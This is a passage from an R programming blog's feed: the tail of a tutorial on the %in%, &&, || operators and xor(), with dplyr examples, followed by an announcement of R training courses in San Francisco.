&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;sf&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;sp&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(world, package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;spData&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# drop the geometry column because we don&amp;#39;t need it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;world &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; world &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_drop_geometry&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Your colleague sends you a list of 50 countries (I’m going to randomly sample the names from the data) and says that they want the average life expectency for each continent group within these 50 countries.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;colleague_countries &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; world &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample_n&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pull&lt;/span&gt;(name_long)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(colleague_countries)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Yemen&amp;#34; &amp;#34;New Zealand&amp;#34; &amp;#34;Kyrgyzstan&amp;#34; &amp;#34;New Caledonia&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [5] &amp;#34;Morocco&amp;#34; &amp;#34;Ecuador&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We could then ask R to return every row where the column &lt;code&gt;name_long&lt;/code&gt; matches any value in &lt;code&gt;colleague_countries&lt;/code&gt; using the &lt;code&gt;%in%&lt;/code&gt; operator&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;world &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(name_long &lt;span style="color:#ff7b72;font-weight:bold"&gt;%in%&lt;/span&gt; colleague_countries) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(continent) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(av_life_exp &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(lifeExp, na.rm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## continent av_life_exp&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;##&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 Africa 63.6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 Asia 72.3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 Europe 79.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 North America 74.6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 Oceania 80.3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 South America 74.3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="did-you-know"&gt;Did you know?&lt;/h4&gt;
&lt;p&gt;You can make your own &lt;code&gt;%%&lt;/code&gt; operators! For instance&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;%add%&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(a, b) a &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; b
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;%add%&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="the--and--operators"&gt;The &amp;amp;&amp;amp; and || operators&lt;/h3&gt;
&lt;p&gt;If you look on the help page for the logical operators &lt;code&gt;&amp;amp;&lt;/code&gt; and &lt;code&gt;|&lt;/code&gt;, you’ll find &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; and &lt;code&gt;||&lt;/code&gt;. What do they do and hope they actually differ from their single counterparts? Let’s look at an example. Take a vector &lt;code&gt;x&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To test for the values in x that are greater than 3 and less than 7 we would write&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE TRUE TRUE FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then to return these values we would subset using square brackets&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x[x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 4 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;What happens if we repeat these steps with &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt;?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x[x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## numeric(0)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;What is happening here is that the double &lt;code&gt;&amp;amp;&lt;/code&gt; only evaluates the first element of a vector. So evaluation proceeds only until a result is determined. This has another nice consequence. For example, take the object &lt;code&gt;a&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In the following test&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; a &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; a &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;All 3 tests are evaluated, even though we know that after the first test, &lt;code&gt;a == 4&lt;/code&gt;, this test is &lt;code&gt;FALSE&lt;/code&gt;. Where as in using the double &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; a &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; a &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here we only evaluate the first test as that is all we need to determine the result. This is more efficient as it won’t evaluate any test it doesn’t need to. To demonstrate this, we’ll use two toy functions&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Hi I am f&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;b &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Hi I am g&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;a&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;b&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Hi I am f&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Hi I am g&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When using the single &lt;code&gt;&amp;amp;&lt;/code&gt;, R has to evaluate both functions even thought the output of the left hand side is FALSE&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;a&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;b&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Hi I am f&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;But using &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt;, R only has to evaluate the first function until the result is determined! It’s the same rule for &lt;code&gt;||&lt;/code&gt;…&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;b&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;a&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Hi I am g&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Hi I am f&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;b&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;a&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Hi I am g&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="the-xor-function"&gt;The xor() function&lt;/h3&gt;
&lt;p&gt;This last one isn’t so much an operator as a function. The &lt;code&gt;xor()&lt;/code&gt; function is an exclusive version of the &lt;code&gt;|&lt;/code&gt;. Take two vector, x and y&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To get all the elements where either &lt;code&gt;x&lt;/code&gt; is 1 or y is 2 we would write&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&lt;/span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE TRUE TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;However, this will also return the elements where x = 1 AND y = 2. If we only want elements where only one statement is &lt;code&gt;TRUE&lt;/code&gt;, we would use xor()&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;xor&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; , y &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE FALSE TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;That’s all for this time. Thanks for reading!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-overview-operators/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Training courses in San Francisco</title><link>https://www.jumpingrivers.com/blog/r-training-courses-san-francisco/</link><pubDate>Sun, 08 Dec 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-training-courses-san-francisco/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-training-courses-san-francisco/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-training-courses-san-francisco/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Jumping Rivers are coming to San Francisco in January 2020! We&amp;rsquo;ll be running a number of R training courses with &lt;a href="https://www.paradigmdata.io/" rel="external"&gt;Paradigm Data&lt;/a&gt;. You can find the booking links and more details over at our &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;courses page&lt;/a&gt;. Don&amp;rsquo;t be afraid to get in contact if you have any questions!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-r-training-courses-san-francisco"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
